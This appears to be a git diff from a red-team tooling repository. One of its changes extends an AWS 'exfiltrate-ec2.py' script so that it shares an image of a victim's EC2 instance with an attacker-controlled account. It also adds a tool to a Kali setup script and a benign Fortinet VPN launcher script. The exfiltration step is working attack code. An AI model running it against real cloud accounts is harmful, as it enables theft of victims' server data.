diff --git a/clouds/aws/exfiltrate-ec2.py b/clouds/aws/exfiltrate-ec2.py index aa425d2..d9fa49a 100644 --- a/clouds/aws/exfiltrate-ec2.py +++ b/clouds/aws/exfiltrate-ec2.py @@ -21,6 +21,7 @@ # CreateImage: # Abuses: # ec2:CreateImage +# ec2:ModifyImageAttribute # # NOT FULLY IMPLEMENTED YET. # For this technique, the procedure is following - the script will create an image out of specified victim's EC2 @@ -351,13 +352,28 @@ To examine exfiltrated data: except Exception as e: Logger.fatal(f"ec2:CreateImage action on Victim failed. Exception: {e}") - # Step 2: Import custom SSH RSA public key + target_user = self.get_account_id('attacker') + Logger.out(f"Step 2: Modifying image attributes to share it with UserId = {target_user}") + try: + modify_result = victim_client.modify_image_attribute( + Attribute = 'launchPermission', + ImageId = created_image['ImageId'], + OperationType = 'add', + UserIds = [ + target_user, + ] + ) + Logger.ok(f"Image's attributes modified to share it with user {target_user}") + except Exception as e: + Logger.fatal(f"ec2:ModifyImageAttribute action on Victim failed. Exception: {e}") + + # Step 3: Import custom SSH RSA public key # client.import_key_pair( # KeyName = "Some key name" # PublicKeyMaterial = "key material" # ) - # Step 3: Create an instance from exported AMI + # Step 4: Create an instance from exported AMI # client.run_instances( # ImageId = "ami-00000000", # SecurityGroupIds = ["sg-00000", ], @@ -370,7 +386,7 @@ To examine exfiltrated data: # Returns: # "i-00001111002222" - # Step 4: Connect to that EC2 instance + # Step 5: Connect to that EC2 instance # client.describe_instances( # InstanceIds = ["i-00001111002222"], # Query = "Reservations[0].Instances[0].PublicIpAddress" diff --git a/linux/prepare-kali.sh b/linux/prepare-kali.sh index 876a71b..b30ad46 100644 --- a/linux/prepare-kali.sh +++ b/linux/prepare-kali.sh @@ -121,6 +121,7 @@ cd aws git_clone https://github.com/RhinoSecurityLabs/pacu.git ; cd pacu ; bash install.sh ; cd .. git_clone https://github.com/Alfresco/prowler.git git_clone https://github.com/sa7mon/S3Scanner.git +git_clone https://github.com/percolate/ec2-security-groups-dumper.git git_clone https://github.com/ankane/s3tk.git git_clone https://github.com/andresriancho/enumerate-iam git_clone https://github.com/arkadiyt/aws_public_ips.git diff --git a/others/README.md b/others/README.md index ee16585..44be154 100644 --- a/others/README.md +++ b/others/README.md @@ -7,6 +7,8 @@ - **`encrypt.rb`** - Simple File Encryption utility (with support for Blowfish, GOST, IDEA, AES) capable of encrypting directories. ([gist](https://gist.github.com/mgeeky/751c01c4dac99871f4da)) +- **`forticlientsslvpn-expect.sh`** - Forticlient SSL VPN Client launching script utilizing expect. Useful while working for clients exposing their local networks through a Fortinet SSL VPN. [gist](https://gist.githubusercontent.com/mgeeky/8afc0e32b8b97fd6f96fce6098615a93/raw/cf127be09d02e04c00eb578e4ef1219a773d21cf/forticlientsslvpn-expect.sh) + - **`playRTPStream.sh`** - Using rtpdump to play RTP streams from PCAP files with VLC. This script was useful to extract RTP Streams from sniffed VoIP communication and then with a help of VLC to dump those streams into valid .wav files. (https://github.com/hdiniz/rtpdump). [gist](https://gist.github.com/mgeeky/0b8bd81a3f6fb70eec543bc0bae2f079) - **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a) diff --git a/others/forticlientsslvpn-expect.sh b/others/forticlientsslvpn-expect.sh new file mode 100644 index 0000000..0acfd1b --- /dev/null +++ b/others/forticlientsslvpn-expect.sh @@ -0,0 +1,63 @@ +#!/bin/bash + +# Forticlient SSL VPN Client launching script utilizing expect. + +# -------------------------------------------- +# CONFIGURATION + +# If empty - script will take some simple logic to locate appropriate binary. +FORTICLIENT_PATH="" + +# VPN Credentials +VPN_HOST="host:10443" +VPN_USER="username" +VPN_PASS="password" + +# -------------------------------------------- + +trap ctrl_c INT + +function ctrl_c() { + echo "Removing left-over files..." + rm -f /tmp/expect +} + +if [[ $EUID -ne 0 ]]; then + echo "This script must be run as root" + exit 1 +fi + +if [ -z "$FORTICLIENT_PATH" ]; then + FORTICLIENT_PATH=`uname -r | grep -q 64 && echo $(locate forticlientsslvpn_cli | grep 64bit) || echo $(locate forticlientsslvpn_cli | grep 32bit)` + if [ ! -f $FORTICLIENT_PATH ]; then + echo "Tried to locate Forticlient SSL VPN Cli binary, but failed." + echo "Specify it at variable FORTCLIENT_PATH" + exit 1 + fi + echo "Located Forticlient VPN Client at: $FORTICLIENT_PATH" +fi + +echo "Killing previous instances of Forticlient SSL VPN client..." +killall -9 $(basename $FORTICLIENT_PATH) 2> /dev/null + +cat << EOF > /tmp/expect +#!/usr/bin/expect -f +match_max 1000000 +set timeout -1 +spawn $FORTICLIENT_PATH --server $VPN_HOST --vpnuser $VPN_USER --keepalive +expect "Password for VPN:" +send -- "$VPN_PASS" +send -- "\r" + +expect "Would you like to connect to this server? (Y/N)" +send -- "Y" +send -- "\r" + +expect "Clean up..." +close +EOF + +chmod 500 /tmp/expect +/usr/bin/expect -f /tmp/expect + +rm -f /tmp/expect \ No newline at end of file